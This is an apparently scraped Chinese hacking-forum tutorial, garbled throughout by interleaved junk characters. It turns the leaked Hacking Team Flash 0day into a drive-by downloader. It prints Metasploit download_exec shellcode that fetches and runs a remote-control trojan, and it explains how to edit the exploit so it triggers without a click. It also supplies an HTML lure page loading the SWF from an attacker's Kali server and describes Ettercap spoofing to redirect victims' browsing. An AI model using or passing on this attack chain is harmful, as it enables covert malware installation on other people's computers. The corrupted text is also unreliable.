8 R5 I5 w4 }/ a/ [3 p 三、flash 0day之手工代码修改制作下载者实例入侵演示 $ g( k$ X' T2 D* [
/ K% Q" P6 S8 K3 e c- \% J利用到的工具: ! ? L2 C+ {) i) S: N6 E( _3 i
Msf
+ a7 S2 U/ S7 X2 PEttercap # g! `$ _. e4 k3 \3 x
( y0 f- F& k- O; Z9 Fy5 C3 |' V) h9 O1 m! R Adobe Flash CS6
, w, J; s) H& `Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
- c$ ?- d, m) c7 M 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
. ~. U( z1 t# O; c2 X/ o$ \' ^8 ^# m/ G1 a( j% } k 如图:
0 `; N" A8 e3 Y H+ o+ ?% T2 u4 j% n% x" V
, U5 a2 c5 j. X7 {3 e4 @
- l. w7 [4 R/ F1 |0 U' [) s& l) c& ]3 v; s5 | d6 X$ Q3 f 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 8 Q3 i( B& x& V/ C/ R2 t! K
" ~. k) d' b! I( s1 b! G) n! T4 P% Y! U! c, J9 f8 a
2 @6 O7 J0 D# A+ _. c- j1 b) D1 `$ b9 j
! E& h# J! ?8 w8 O) Z 然后执行generate -t dword生成shellcode,如下: 3 J* j# \9 A! p6 I1 W3 w6 e
& o& ^4 `+ h. q0 ~& w 0 q1 X# L. f! R
& U) N- D. L& ?. h 复制代码到文本下便于我们一会编辑flash exp,如下:
5 k$ Q! L8 |& X3 P! r+ b+ _: K# l7 p6 ^/ P% d 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
* g# R+ `) t& m1 ]. J# ] 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 1 f. w/ Y- P6 u( T) U
. ]2 X# | R* }0 y1 u; a4 h$ T" C- V4 @& P, l 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
' Z1 K# D: @* p0 x) ^& ? 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 1 m8 N! J- L Y0 T5 L
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, - O5 q P- T m5 U
& i& v+ N2 m, N3 o& H; @! n1 o0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / r4 E0 A% M: P1 h% J
, U8 x A/ \+ B, V/ f- Y6 {0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
) p4 |$ i2 o$ b5 v% R 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
! t% }' y6 M, _1 q9 E5 z9 X+ J( e: A2 J4 p% a 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
5 r" l# H9 M6 I8 b9 Z" h& |" P/ C; B: ?; c 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
, V& T1 v7 L/ V6 U- Y9 r. U0 S2 T- M* [) t" x8 K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, , @$ _6 e3 K0 U' R- r
; {/ N; |$ u% J' B( v. v& I1 k4 V) W/ c) g* U4 T( e 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 3 o! G* |: h! A( p" d2 p8 T( j
6 ~9 s. n( l$ V( ]8 d, @1 A# O0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 7 P, g' L) k, w1 @. j
8 u! A" R) i0 ~6 ?' t3 Z. B) B7 e" l; F" C1 [9 s# _5 U. ~
6 ?# O, a. l; G9 ~+ U0 F! \* U( i( U0 v
* Q) o% l8 c6 v4 i3 u4 N0 s 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
/ D( a2 t0 i0 U7 N, p- b6 @4 W1 _$ [4 w3 k8 c
先修改ShellWin32.as,部分源代码如图: ' a7 R) i2 }/ |% H9 r _0 V) t9 g
( s, R, a3 w4 v* R9 v. u
1 Z- n6 j( y7 ^& |& \7 h我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 0 O$ V3 g2 v% M: k: ~
$ h- F1 g8 w- a2 p
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
: n2 R% k% K5 V* x3 g2 E/ i; _8 s- N% [; Y" C' M) \, E- x, E
8 d- _% M& I7 g+ o I/ r! Q; V 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 9 [' j+ M" Y* u
0 D% ^. t. u+ E7 L [
9 Z6 K$ x. P& J( I3 p4 H2 E, r
然后点保存,下面我们来编译一下,打开
+ G& n; {( h' n4 e: rexp1.fla然后点文件-发布,看看编译没错误
/ r5 b% a6 x- y" B4 u7 n) R$ C( }- k1 l |8 m1 T0 j0 Q5 S
# N/ Q! z/ {! r5 O4 S1 r1 n" V' j) f * w5 P& o% T0 H- ~5 b3 B5 v
% M6 u" s9 b% T$ r
% {- x: X) j5 O" [7 v2 w) L
2 B7 \8 D3 S; \6 Q& T' _, [; F8 D. a. F- L$ ~) @- P0 i 然后我们把生成的
exp1.swf丢到kailinux 的/var/www/html下:
]1 \7 i2 f! M; x. a+ z# q% q: C 然后把这段代码好好编辑一下 ( I$ y! W H! V) W. M
, \8 r, H+ O) L% r: D
, v' o9 u, g7 V5 q8 B3 R* r
, l. l. X8 Z+ j% s; b% u* M" w! C- g* } I : l% b& e! E9 u0 Y
' j; H% v3 \" q6 G
<!DOCTYPE html>
, x& o9 g/ m/ H! m0 H: [7 }5 S<html>
0 h4 A$ W. |8 m" \7 }' r9 F7 w% J <head>
( a o& N$ l: G; v' a- o' b& P<meta http-equiv="Content-Type" content="text/html;
+ [- E, f, x' E) y% J3 K) R/ g2 Q8 a charset=utf-8"/>
/ P+ N: S2 x! _4 ~! D1 i5 N</head> 6 z2 y2 U Q& ] j
d U4 M0 |3 a; k: v6 G1 A) T <body>
2 w, b; }8 q- K+ M <h2> Please wait, the requested page is loading...</h2> ; n) p# z; M: m2 v
- r& V4 [8 c6 I" [6 n! u% ^6 p4 b5 f1 O9 P2 D7 ?/ O$ r' W7 p <br>
$ z0 \+ v5 n6 V4 T1 N<OBJECT
4 k9 l. p/ J0 P: K7 Lclassid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 6 T. W9 Q7 E7 o3 y% B7 L
; P& C3 X e7 E$ K+ h) I% L0 _6 A VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
</body> $ W2 `) M+ j3 r! i* K; f0 t' I
* m3 c2 o; b2 O- I+ \6 m<script>
setTimeout(function () { 4 ]( y e$ ?) I+ w7 X% t
$ {5 X" ?" M1 d# |/ l6 X2 q- L" s6 m' t0 r7 Z# X! s: n) P
1 W2 J1 M2 E2 L' y. Hp1 Y: u3 I/ O, h% L# ] window.location.reload();
' [7 [( d9 y7 [7 a0 K1 D: M8 T. F& z- L- H" b }, 10000); . E# {$ r A' g7 U% ]" k
3 h( N1 J* ~: L' R4 @ L X. y( K* R
! f5 y1 ?* U8 J0 ]7 _1 y/ M* ^- j4 {7 S7 I% U- H </script> % ]) z. Z5 p6 X4 l* k: K/ d& D
</html>
6 s* i5 L+ q; c5 A: H/ t9 q3 n7 w5 F+ l- Y5 [/ [! ?0 k* o
6 z) A/ a, J a4 L0 ^ ?# X5 J" ~9 W* T+ U( F# j6 ` 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 p/ v! p5 k$ R& \4 D- B) V
: U7 Q4 q! ]9 s0 `" U2 @8 B, a e9 d3 i
`7 I% F9 y: W' U7 X0 U: s% Q) n: g2 r
( j* [; o$ }. Y
下面我们用ettercap欺骗如图:
! Q! I& d' X& d+ E* S- G4 s5 k7 M7 X* J
* b, M6 Q9 E0 [6 h" f" ]' C h+ N3 f4 ?+ p% U
/ z0 {& w# l) ]2 A: v- c( m. A 下面我们随便访问个网站看看:
' S" w" W4 B/ i) @我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 0 Y# ~8 Y* I7 t3 Y0 Y
$ H6 f7 K0 Y& N+ u+ r1 f1 c9 o! j& m c9 L: W" z
+ k* q2 ?4 W P% L8 \' R6 b3 K5 @ 我们看另一台, * L% _5 T+ P" f! W
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |